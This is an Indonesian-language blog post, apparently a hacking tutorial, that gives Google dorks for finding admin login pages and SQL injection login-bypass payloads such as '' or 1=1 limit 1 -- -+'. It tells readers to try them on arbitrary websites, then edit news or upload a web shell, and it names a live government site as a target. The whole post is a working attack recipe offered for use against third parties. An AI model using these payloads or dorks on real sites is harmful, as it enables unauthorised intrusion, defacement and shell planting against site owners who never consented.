Bahan - bahan :
1. Dork (Ada di bawah)
2. Shell / Uploader
3. Kopi GoodDay + Rokok :vosss
4. SABAR :3
Dork :
inurl:/login.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl:/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
1. Dorking ke Google. Misal gua pake dork:
inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.
3. Isi username + pass dengan :
'=''or' atau ' or 1=1 limit 1 -- -+
4. Jika vuln, maka akan masuk ke Control Panel / Admin Panel web tersebut.
Jika login gagal, cari web yang lain. ( Ini gunanya SABAR :v )
5. Dan jika berhasil login, terserah kalian mau diapain :3 .
Bisa add / edit News atau mungkin kalo lagi beruntung bisa upload shell :3
NB:NGGAK SEMUA WEBSITE BISA DI BYPASS
Live Target :
- https://jdih.dpd.go.id/admin/login.php
Okee sekian.
Post a Comment
1 Comments
Oke gann
ReplyDelete